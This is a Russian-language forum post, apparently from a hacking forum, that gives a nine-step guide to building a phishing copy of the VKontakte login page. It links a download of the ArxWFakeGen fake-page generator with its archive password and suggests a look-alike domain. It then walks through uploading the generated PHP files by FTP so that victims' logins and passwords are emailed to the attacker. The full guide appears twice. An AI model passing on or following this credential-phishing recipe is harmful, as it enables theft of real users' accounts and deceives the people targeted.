Heclan
Заблокированные
- Статус
- offline
- Регистрация
- 24.03.2017
- Сообщения
- 9
- Репутация
- 5
Делаем фейк сайта.
Копипаст, сылку на прогу заменил, мб баян, мб кому то годнота
Суть фейка - вместо того чтобы авторизироваться, введённые логин и пароль отсылаются вам на email.
Как же сделать такое чудо?
Для примера я буду делать фейк контакта:
1) Качаем ArxWFakeGen (Пароль на архив " Heclan ")
2) Регистрируем сайт на бесплатном хостинге например как
Hostinger, Hut (в ваших же интересах, чтобы домен хоть как-то напоминал домен, на который вы делаете фейк, я остановился на vkontakteh.hut4.ru)
3) Ждём пока вам придёт письмо Your domain "ваш сайт" has been registered
Ищем в содержимом:
Для доступа к серверу Вы можете использовать любой FTP клиент.
Параметры соединения:
Server: vkontakteh.hut4.ru
login: ********
password: ********
4) Cкачиваем, FileZilla (поиск гугл), устанавливаем, запускаем
5) В поле "Хост:" вводим содержимое строки Server: из письма, в поле "Имя пользователя:" вводим содержимое строки login:, в поле "Пароль:" вводим password:
Нажимаем "Быстрое соединение"
6) Открываем ArxWFakeGen.exe, в поле "Страница:" вбиваем адрес странички, из которой хотим сделать фейк, в поле "Переадресация:" вбиваем сайт, на который жертва попадет, посте того, как введет логин и пароль. В "Тип базы" выбираем "Отсылать на почту", и вводим свой email (на него будут отправляться логины и пароли). Больше ничего не трогаем, нажимаем "Создать". Если из страницы возможно сделать фейк, появится окошко "Перехват полей", отмечаем поля "login, email, pass" и так далее. Если не уверены, что отмечать, отметьте все. Нажимаем продолжить, закрыть.
7) В папке с ArxWFakeGen.exe должны появится два файла - login.php и index.php
8) Возвращаемся в filezill`у. Удаляем из каталога сайта всё, кроме папки WWW, и удаляем все ее содержимое. Заливаем туда (просто перетащите) два наших файла.
9) Готово, открываем наш сайт. Если всё сделано правильно, то его не отличить от оригинала, вводим ложные email и пароль для проверки, открываем почтовый ящик, который мы указали в пункте 6. Там должно лежать письмо с логином и паролем.
https://dark2web.app/data/attachments/13/13884-1dfe0fe6c274a628a32a2144e0e72fbd.jpg
VT: https://virustotal.com/ru/file/9831...d06265b8b58594db42dda8cf/analysis/1490733619/
Перезалил на Sendspace без пароля: https://www.sendspace.com/file/mpgqnj
Копипаст, сылку на прогу заменил, мб баян, мб кому то годнота
Суть фейка - вместо того чтобы авторизироваться, введённые логин и пароль отсылаются вам на email.
Как же сделать такое чудо?
Для примера я буду делать фейк контакта:
1) Качаем ArxWFakeGen (Пароль на архив " Heclan ")
2) Регистрируем сайт на бесплатном хостинге например как
Hostinger, Hut (в ваших же интересах, чтобы домен хоть как-то напоминал домен, на который вы делаете фейк, я остановился на vkontakteh.hut4.ru)
3) Ждём пока вам придёт письмо Your domain "ваш сайт" has been registered
Ищем в содержимом:
Для доступа к серверу Вы можете использовать любой FTP клиент.
Параметры соединения:
Server: vkontakteh.hut4.ru
login: ********
password: ********
4) Cкачиваем, FileZilla (поиск гугл), устанавливаем, запускаем
5) В поле "Хост:" вводим содержимое строки Server: из письма, в поле "Имя пользователя:" вводим содержимое строки login:, в поле "Пароль:" вводим password:
Нажимаем "Быстрое соединение"
6) Открываем ArxWFakeGen.exe, в поле "Страница:" вбиваем адрес странички, из которой хотим сделать фейк, в поле "Переадресация:" вбиваем сайт, на который жертва попадет, посте того, как введет логин и пароль. В "Тип базы" выбираем "Отсылать на почту", и вводим свой email (на него будут отправляться логины и пароли). Больше ничего не трогаем, нажимаем "Создать". Если из страницы возможно сделать фейк, появится окошко "Перехват полей", отмечаем поля "login, email, pass" и так далее. Если не уверены, что отмечать, отметьте все. Нажимаем продолжить, закрыть.
7) В папке с ArxWFakeGen.exe должны появится два файла - login.php и index.php
8) Возвращаемся в filezill`у. Удаляем из каталога сайта всё, кроме папки WWW, и удаляем все ее содержимое. Заливаем туда (просто перетащите) два наших файла.
9) Готово, открываем наш сайт. Если всё сделано правильно, то его не отличить от оригинала, вводим ложные email и пароль для проверки, открываем почтовый ящик, который мы указали в пункте 6. Там должно лежать письмо с логином и паролем.
https://dark2web.app/data/attachments/13/13884-1dfe0fe6c274a628a32a2144e0e72fbd.jpg
VT: https://virustotal.com/ru/file/9831...d06265b8b58594db42dda8cf/analysis/1490733619/
Перезалил на Sendspace без пароля: https://www.sendspace.com/file/mpgqnj
Вложения
Последнее редактирование:
